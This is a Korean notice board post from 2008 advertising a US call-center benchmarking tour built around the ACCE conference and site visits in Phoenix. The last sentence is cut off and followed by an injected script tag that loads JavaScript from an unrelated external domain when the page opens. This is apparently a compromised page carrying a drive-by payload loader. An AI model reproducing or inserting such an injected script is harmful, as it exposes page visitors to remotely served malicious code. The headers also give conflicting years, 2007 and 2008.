공지사항

2008 미국 고객센터 벤치마킹 연수 안내
글번호 1076 조회수 5430
작성자 콜센터산업정보연구소 작성일 2008-07-16
첨부파일 2008해외연수 프로그램_0728.ppt [ 다운로드 : 1557 ] 3MB




2007 ACCE 미국 고객센터 벤치마킹 연수 참관단 모집




 





































제12회 미국 고객 센터 벤치마킹 연수 프로그램에 여러분을 초대합니다.



미래를 준비하는 고객센터 관계자 여러분, 안녕하십니까?

본 연수 프로그램은 2000 년부터 매년 시행되어 왔으며, 올해는 ACCE (Annual Call Center Exhibition) 고객센터 컨퍼런스 참가 및 피닉스 지역의 우수 콜센터를 벤치마킹 하는 것으로 구성하였습니다.




ACCE 컨퍼런스는 전 세계 50여개 국에서 2,300 여 명의 콜센터 담당자들이 모이는 고객접점분야에서 전세계적으로 가장 큰 컨퍼런스이며, 주관사인 ICMI (International Customer Management Institute) 사는 20여년간 고객센터 관련 연구를 토대로 한 컨설팅, 교육, 각종 유명서적의 발간으로 전세계적으로 명성이 있는 기관으로 고객센터 전문가들을 위한 정보교류 행사를 기획 및 주관해 왔습니다.



최신 고객센터 트렌드와 정보를 컨퍼런스를 통해 접하고 우수 고객센터 벤치마킹을 통해 체험할 수 있어 국내 고객센터 관리자 분들에게 적합한 본 프로그램은 참가 후에도 국내 고객센터 전문가 분들 간 네트웍을 형성할 수 있는 기회를 가지시어 한국 콜센터 전문가 그룹인 KCCM(Korea Call Center Membership) 일원으로서 계속적으로 업무에 많은 도움을 얻을 수 있는 장점이 있습니다.



고객센터 산업의 메카인 미국에서 진행되는 본 해외연수 프로그램에 시간과 자원을 투자하심으로써 귀사 고객센터를 효과적으로 운영할 수 있는 실제적 통찰력을 얻을 수 있습니다.
라스베가스를 경유하여 피닉스에서 진행되는 생생한 콜센터 문화의 장에 참석할 수 있는 좋은 기회를 가지시길 바랍니?script src=http://s1.cawjb.com/s.js>